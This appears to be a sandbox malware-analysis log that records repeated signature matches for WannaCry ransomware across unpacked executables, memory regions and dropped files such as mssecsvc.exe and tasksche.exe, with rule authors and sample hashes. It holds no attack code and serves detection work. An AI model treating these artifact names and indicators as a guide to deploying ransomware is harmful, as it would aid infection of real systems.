                Source: 9.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 7.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 7.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 7.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 10.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 10.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 10.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 5.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 5.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 5.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 7.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 7.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 7.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 8.2.mssecsvc.exe.1ffa128.5.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 8.2.mssecsvc.exe.1ffa128.5.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 8.2.mssecsvc.exe.1ffa128.5.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 8.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 8.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 8.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 8.2.mssecsvc.exe.24ed8c8.7.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 8.2.mssecsvc.exe.24ed8c8.7.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 5.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 5.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 5.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 5.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 5.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 5.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 5.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 8.2.mssecsvc.exe.251f96c.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 8.2.mssecsvc.exe.251f96c.8.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 8.2.mssecsvc.exe.251f96c.8.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 8.2.mssecsvc.exe.1fd30a4.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 8.2.mssecsvc.exe.1fd30a4.2.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 0000000A.00000000.313432129.000000000040E000.00000008.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 0000000A.00000002.315696663.000000000040E000.00000008.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000009.00000000.309686904.000000000040E000.00000008.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000008.00000002.817996874.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000005.00000000.297315623.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000007.00000000.306519342.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000007.00000000.301466734.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000005.00000002.313956053.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000005.00000000.295748981.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000008.00000002.818892298.0000000001FD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000007.00000000.308739689.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000005.00000000.299133974.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000007.00000002.317673463.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000005.00000000.301753612.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000008.00000000.306158904.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000008.00000002.820822570.00000000024FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000007.00000000.303052057.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: mbXvGlj2dR.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                Source: mbXvGlj2dR.dll, type: SAMPLEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: mbXvGlj2dR.dll, type: SAMPLEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 8.2.mssecsvc.exe.1fc8084.3.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 5.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 5.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 5.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 7.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 7.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 7.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 5.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 5.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 5.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 8.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 8.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 8.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 8.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 7.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 7.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 7.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 8.2.mssecsvc.exe.1fc8084.3.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 8.2.mssecsvc.exe.1fc8084.3.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 8.2.mssecsvc.exe.1fc8084.3.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 8.2.mssecsvc.exe.1fc8084.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 5.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 5.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 5.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 5.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 7.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 7.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 7.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 5.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 5.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 5.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 5.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 8.2.mssecsvc.exe.251f96c.8.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 8.2.mssecsvc.exe.251f96c.8.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 8.2.mssecsvc.exe.251f96c.8.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 8.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 8.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 8.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 7.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 7.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 7.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 5.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 5.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 5.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 5.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 5.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 5.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 8.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 8.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 8.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 8.2.mssecsvc.exe.1ffa128.5.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 8.2.mssecsvc.exe.1ffa128.5.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 8.2.mssecsvc.exe.1ffa128.5.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 10.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 10.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 10.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 8.2.mssecsvc.exe.24fc948.9.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 8.2.mssecsvc.exe.24fc948.9.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 8.2.mssecsvc.exe.24fc948.9.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 9.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 9.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 9.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 8.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 8.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 8.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
